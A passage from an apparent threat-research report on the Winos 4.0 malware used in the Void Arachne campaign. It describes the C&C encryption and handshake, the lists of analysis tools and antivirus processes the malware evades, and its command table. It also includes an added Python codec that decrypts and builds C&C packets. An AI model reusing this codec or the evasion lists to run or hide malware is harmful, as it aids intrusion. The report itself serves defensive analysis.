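    """Return the feature flags that are set to '1'."""
    return [flag for flag in FEATURE_FLAGS if fields.get(flag) == "1"]


def describe(fields: dict):
    """Human-readable lines, one per field, using the Table 5 descriptions."""
    return [f"{k} ({FIELD_DESCRIPTIONS.get(k, 'undocumented')}) = {v}" for k, v in fields.items()]


if __name__ == "__main__":
    cfg = parse_config(CLEARTEXT_CONFIG[::-1], stored_reversed=True)
    print("\n".join(describe(cfg)))
    print(c2_endpoints(cfg))
    print(enabled_features(cfg) or "no optional features enabled")
```

Note that the sample configuration lists 127.0.0.1 as its first C&C address, so the stager's first connection attempt goes nowhere; the network indicator to hunt for is the second and third entries, on port 80.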

To communicate with its C&C server, the malware first needs to generate an
encryption key to secure the communication. To generate this key, the malware
calls the timeGetTime() Windows API function, which returns the system time in
milliseconds, and appends “00 00 00 00 ca 00” to it. The data that needs to be
transferred is then encrypted with this key and appended after the key.

Figure 28 is an example of an initial handshake between the stager and the C&C
server. The malware encrypts and sends the hardcoded value “04 00” to its C&C
server to indicate that this initial packet contains the key. The server then
uses this session key for future communications.

Figure 28. Winos 4.0 stager initial packet–encryption key exchange

The encryption algorithm begins by preparing a block of data and a key,
adjusting the buffer to ensure that there is sufficient space to work with both.
The key is then appended to the beginning of the data that needs to be
encrypted. The algorithm proceeds with the encryption process, which involves a
loop that processes each byte of data. For each byte, a specific byte from the
key is selected and transformed by taking its modulus with a hardcoded value
(0x1C8) and then adding another hardcoded value (0x36) to it. This transformed
key is then used to XOR with the current byte of the data, resulting in the
encrypted byte that replaces the original byte in the data. Every ten bytes, the
algorithm resets the pointer to the beginning of the key, ensuring that the key
is reused cyclically.

It should be noted that, based on our analysis, the value 0x1C8 remained the
same in all the samples used in this campaign and several other attacks.
However, we have observed that some variants found in the wild use different
values, such as 0x7C5, indicating that this value might change from sample to
sample. However, the value 0x36 remained the same in all the variants we
analyzed.

Figure 29. Winos 4.0 stager data encryption
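The following Python codec is an added example, not Winos code and not the authors' tooling, that implements the encryption scheme described above so that captured stager traffic can be decoded for analysis: the key is the timeGetTime() value followed by "00 00 00 00 ca 00", each data byte is XORed with ((key byte mod 0x1C8) + 0x36), and the key pointer wraps every ten bytes. The same routine applies to the "06 00"-tagged data packets later sent by LoginModule.dll, with that module's own key in place of the stager's. Three details are assumptions the article does not state: the DWORD from timeGetTime() is packed little-endian, the key byte is treated as an unsigned 8-bit value before the modulus, and the sum is truncated to a byte before the XOR. The timestamp used in the demonstration is constructed.

```python
"""Encode/decode Winos 4.0 stager packets per the described XOR scheme (added example)."""
import struct

KEY_SUFFIX = bytes.fromhex("00000000ca00")  # appended to timeGetTime() by the stager
KEY_PERIOD = 10        # the key pointer is reset to the start every ten bytes
MODULUS = 0x1C8        # constant in this campaign's samples; other variants use e.g. 0x7C5
ADDEND = 0x36          # constant across all variants analysed in the article
HANDSHAKE_MAGIC = b"\x04\x00"  # value carried by the initial key-bearing packet


def build_key(time_ms: int, suffix: bytes = KEY_SUFFIX) -> bytes:
    """Session key: 4-byte timeGetTime() value plus the hardcoded suffix."""
    # ASSUMPTION: the DWORD is stored little-endian, as a Win32 build would write it.
    return struct.pack("<I", time_ms & 0xFFFFFFFF) + suffix


def xor_transform(data: bytes, key: bytes, modulus: int = MODULUS, addend: int = ADDEND) -> bytes:
    """Apply the per-byte XOR; symmetric, so it both encrypts and decrypts."""
    if len(key) < KEY_PERIOD:
        raise ValueError(f"key must be at least {KEY_PERIOD} bytes")
    out = bytearray(len(data))
    for i, byte in enumerate(data):
        k = key[i % KEY_PERIOD]               # pointer wraps every KEY_PERIOD bytes
        k = ((k % modulus) + addend) & 0xFF   # ASSUMPTION: 8-bit key byte, result truncated
        out[i] = byte ^ k
    return bytes(out)


def build_packet(time_ms: int, payload: bytes) -> bytes:
    """Key followed by the payload encrypted under it, as in the stager's first packet."""
    key = build_key(time_ms)
    return key + xor_transform(payload, key)


def parse_packet(packet: bytes):
    """Split a captured packet into (key, decrypted payload)."""
    if len(packet) < KEY_PERIOD:
        raise ValueError("packet is shorter than the 10-byte key")
    key, body = packet[:KEY_PERIOD], packet[KEY_PERIOD:]
    return key, xor_transform(body, key)


if __name__ == "__main__":
    pkt = build_packet(0x12345678, HANDSHAKE_MAGIC)   # constructed timestamp
    print(pkt.hex())
    print(parse_packet(pkt))
```

One consequence of the constants worth knowing when eyeballing captures: the 0xCA byte at key offset 8 transforms to (0xCA + 0x36) & 0xFF = 0x00, so every tenth plaintext byte starting at offset 8 passes through unchanged, and with a key whose timestamp bytes are zero the remaining positions are all XORed with 0x36.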

Next, the C&C server responds with a magic value of “04” and a unique 16-byte
identifier in UTF-16 format. In some Winos variants, this identifier is the MD5
hash of the DLL module that will be downloaded. Figure 30 is an example of the
C&C server response to network traffic.

Figure 30. C&C server response with a unique identifier to the initial packet

Figure 31 shows a decrypted packet data section.

Figure 31. Decrypted C&C response with a unique identifier to the initial packet

The stager then sends the name of the next-stage payload plugin, 登录模块.dll
(LoginModule.dll), to the C&C server to request it.

Figure 32. The Winos 4.0 stager sends the next stager module name to the C&C
server (encrypted packet)

Figure 33 shows the decrypted packet data section.

Figure 33. The Winos stager sends the next stager module name to the C&C
(cleartext)

The C&C server response contains the following information:

 * Module name
 * Module hash
 * Binary loader shellcode
 * DLL module binary file

The stager then saves the decrypted C&C server response (the plugin and its
configuration) into the Windows Registry. It uses the name
"d33f351a4aeea5e608853d1a56661059" and stores it under the key path
HKEY_CURRENT_USER\Console\0 for 32-bit plugins or HKEY_CURRENT_USER\Console\1
for 64-bit plugins.

Figure 34. The Winos stager stores the module sent by the C&C server in the
registry

Finally, to execute the module, the stager locates the shellcode section within
the response received from the C&C server at offset 0xA44 and transfers control
to the shellcode.

Figure 35. Module shellcode DLL loader


WINOS MAIN IMPLANT ANALYSIS

File name: 登录模块.dll (LoginModule.dll)
Magic: PE32 executable (DLL)
SHA256: 78f86c3581ae893e17873e857aff0f0a82dcaed192ad82cd40ad269372366590
Compiler: Microsoft Visual C/C++
Compilation time: 2023-05-23 09:24:23 UTC
Size: 195.00 KB (199680 bytes)
Type: DLL

The 登录模块.dll (LoginModule.dll) is a fundamental component of Winos 4.0, serving
as the core plugin manager for the system. This module is responsible for
handling every action and command executed by the operator, which are
transmitted via the C&C server as DLL plugins. These plugins extend the
functionality of the implant.

Upon receiving the response from the C&C server, the implant stores these DLL
plugins in the Windows registry paths HKEY_CURRENT_USER\Console\0 for 32-bit
systems or HKEY_CURRENT_USER\Console\1 for 64-bit systems. Subsequently, the
implant loads and uses these plugins to perform various tasks, enhancing its
operational capabilities. This modular approach allows for a highly flexible and
extensible framework, enabling the efficient execution of diverse functions as
required by the operator.

Once the 登录模块.dll (LoginModule.dll) plugin is downloaded, the execution of this
module is based on the previously mentioned configuration. The malware creates a
thread to collect clipboard data and keystrokes. It also employs a specific
mutex for this thread, which is named 测试备注 (Test Notes).

Figure 36. Code that shows mutex creation and clipboard data retrieval

Next, the malware chooses one of the three available C&C configurations. Before
initiating the socket, it checks whether the antianalysis feature is configured
to run. If this feature is configured, the malware verifies the presence of
monitoring software by inspecting the window titles of running processes. If
such software is detected, the malware enters sleep mode.

Figure 37. Initializing socket with the C&C server

Below is a list of monitoring software that the malware detects:

 * 流量(Flow)
 * TaskExplorer
 * Wireshark
 * Fiddler
 * Process
 * ApateDNS
 * CurrPorts
 * 任务管理器(Task manager)
 * 火绒(Tinder)
 * 提示符(Prompt)
 * Malwarebytes
 * Port
 * 资源监视器(Resource monitor)
 * Capsa
 * TCPEye
 * Metascan
 * 网络分析(Network analysis)
 * Sniff

The malware collects system information from an infected machine, including the
IP address, computer name, antivirus software, operating system details, and
hardware ID (HWID).

Figure 38. System information-gathering code snippet

Table 6 shows a list of targeted antivirus (AV) software.

AV vendor                      | Targeted AV process
-------------------------------|---------------------------------------------------------------------------------------------------------------
360 Total Security             | 360Safe.exe | 360Tray.exe | 360tray.exe | ZhuDongFangYu.exe | 360sd.exe
金山(Jinshan)                  | Kxetray.exe | KSafeTray.exe | kscan.exe | kwsprotect64.exe | kxescore.exe
QQ                             | QQPCRTP.exe | QMDL.exe | QMPersonalCenter.exe | QQPCPatch.exe | QQPCRealTimeSpeedup.exe | QQPCTray.exe | QQRepair.exe
Baidu                          | BaiduSd.exe | baiduSafeTray.exe
江民(Jiang Min)                | KvMonXP.exe | RavMonD.exe
QuickHeal                      | QUHLPSVC.EXE
Microsoft MSE                  | mssecess.exe
Comodo                         | cfp.exe
DR.WEB                         | SPIDer.exe
Outpost                        | acs.exe
安博士V3 (Dr. An V3)           | V3Svc.exe
韩国胶囊(Korean capsules)      | AYAgent.aye
AVG                            | avgwdsvc.exe
F-Secure                       | f-secure.exe
卡巴(Kaba)                     | avp.exe | avpui.exe
McAfee                         | Mcshield.exe
NOD32                          | egui.exe
可牛(Ke Niu)                   | knsdtray.exe
Trend Micro                    | TMBMSRV.exe
小红伞(Red Umbrella)           | avcenter.exe
Norton                         | rtvscan.exe
Avast                          | ashDisp.exe
Panda Antivirus Titanium       | remupd.exe
BitDefender                    | vsserv.exe
PSafe                          | PSafeSysTray.exe
Ad-watch                       | ad-watch.exe
K7                             | K7TSecurity.exe
UnThreat                       | UnThreat.exe

Table 6. List of targeted antivirus software


Next, the malware employs the encryption algorithm that we’ve previously
discussed to encrypt all collected data. Using the timeGetTime() Windows API
function, a new key will be generated to encrypt the collected data, which is
different from the key used during the stager’s initial request. The malware
appends the hardcoded value “06 00” to the encryption key to indicate that this
request contains collected data. Unlike the stager, LoginModule.dll doesn’t send
the key in a separate request, instead, it prefixes the value of the key to the
collected data and sends this encrypted request to the C&C server. 

Figure 39. Code snippet showing the encryption and transmission of collected
information to the C&C server

Figure 40 shows the initial packet that the malware sends.

Figure 40. Initial packet sent by 登录模块.dll (LoginModule.dll)
Figure 41. 登录模块.dll (LoginModule.dll) decrypted initial traffic

The malware then begins to listen for incoming commands from the C&C server. It
can execute a variety of tasks, including loading additional plugins, capturing
screenshots, and clearing system logs. These functions are managed and executed
through controlled switch statements, ensuring precise and efficient handling of
each instruction.

Table 7 lists the malware’s supported functionalities.

Command | Description
--------|------------------------------------------------------------------------------------------------
0       | Load plugins
1       | Load the plugin and update the registry
2       | Terminate the connection
3       | Send the active window information and capture a screenshot
4       | Capture a screenshot
5       | Execute file and commands
6       | Download a file from the given URL and execute it
7       | Modify the registry value of specific keys and, if the key doesn’t exist, create it
8       | Check whether a process with the provided name exists on the system by enumerating the list of running processes
9       | N/A
10      | Capture a screenshot
11      | Clear system logs: Application, security, and system
12      | Restart the process
13      | Terminate the process
14      | Logout from the system
15      | Restart the system
16      | Shutdown the system
17      | Change the default plugin loading method
18      | Update configuration settings
19      | Create a new C&C thread and perform system information collection
100     | Set the value of IpDatespecial registry
101     | Remove the value of IpDatespecial registry

Table 7. A list of the malware’s supported functionalities


CONCLUSION

In the scope of our research, we conducted an analysis of a Void Arachne
campaign that targets the Chinese-speaking demographic. Using SEO poisoning and
widely used messaging applications such as Telegram, the Void Arachne threat
group has potentially reached a substantial Chinese-speaking demographic as well
as the broader East Asian community through the dissemination of malicious MSI
files.

As is the case with Void Arachne’s campaign, threat actors abused the great
public interest in AI technologies to deliver malware. Our investigation
revealed that Void Arachne promoted compromised MSI files embedded with
nudifiers and deepfake pornography-generating software, intending to infect
unsuspecting users. Furthermore, the group advertised corrupted AI voice and
facial technologies, frequently exploited in virtual kidnapping schemes. The
proliferation of these artificial technologies has prompted concerns regarding
potential misuse, particularly evident in sextortion and virtual kidnapping
schemes that can lead to heartbreaking consequences. In its commitment to
safeguarding the general public’s online well-being, Trend Micro has curated
comprehensive resources designed to educate the community on identifying,
preventing, and addressing sextortion attacks. In the event of falling victim to
sextortion or virtual kidnapping, the prompt reporting of the incident to
relevant authorities, such as the Internet Crime Complaint Center (IC3), is
strongly recommended.

Throughout 2024, we have seen an increase in malicious MSI files, such as in a
DarkGate campaign that exploited the Microsoft Windows Internet Shortcut
SmartScreen Bypass Vulnerability (CVE-2024-21412). Individuals are strongly
advised to check the source of MSI files and only download them from trusted
sources. As previously discussed, MSI files are bundled installers, which means
that malicious software as well as zero-day exploits can be bundled alongside
legitimate software. These malicious MSI files pose a significant threat to
organizations as they may act as a backdoored installer and poison the software
installer supply chain.

Organizations can protect themselves from these kinds of attacks with Trend
Vision One, which enables security teams to continuously identify attack
surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision
One helps organizations prioritize and address potential risks, including
vulnerabilities. It considers critical factors, such as the likelihood and
impact of potential attacks, and offers a range of prevention, detection, and
response capabilities. This is all backed by advanced threat research, threat
intelligence, and AI, which helps reduce the time taken to detect, respond, and
remediate issues. Ultimately, Trend Vision One can help improve the overall
security posture and effectiveness of an organization, including defending an
organization against zero-day attacks.

When faced with uncertain intrusions, behaviors, and routines, organizations
should assume that their system is already compromised or breached and work to
immediately isolate affected data or toolchains. With a broader perspective and
rapid response, organizations can address breaches and protect their remaining
systems, especially with technologies such as Trend Micro™ Endpoint Security™
and Trend Micro Network Security, as well as comprehensive security solutions
such as Trend Micro™ XDR, which can detect, scan, and block malicious content
across the modern threat landscape.

The complete list of indicators of compromise (IoCs) can be found here. 

 

Tags
APT & Targeted Attacks | Endpoints | Malware | Research | Articles, News,
Reports


AUTHORS

 * Peter Girnus
   
   Sr. Threat Researcher

 * Aliakbar Zahravi
   
   Staff Researcher

 * Ahmed Mohamed Ibrahim
   
   Malware Researcher
